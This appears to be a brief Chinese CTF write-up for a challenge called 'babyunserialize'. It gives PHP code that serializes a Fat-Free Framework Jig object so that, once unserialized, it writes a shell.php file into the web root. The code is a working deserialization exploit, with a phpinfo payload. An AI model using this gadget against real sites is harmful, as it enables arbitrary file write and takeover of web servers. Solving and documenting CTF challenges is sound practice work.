babyunserialize

扫出源码www.zip。

jig.php存在任意写,直接getshell。

<?php
namespace DB;
class Jig {
    const
        FORMAT_JSON=0,
        FORMAT_Serialized=1;
    protected
        $dir = '/var/www/html/',
        $format = self::FORMAT_JSON,
        $data = array("shell.php"=>array("a"=>"<?php phpinfo();?>")),
        $lazy = 1;
}
$jig = new Jig();
echo urlencode(serialize($jig));

Last updated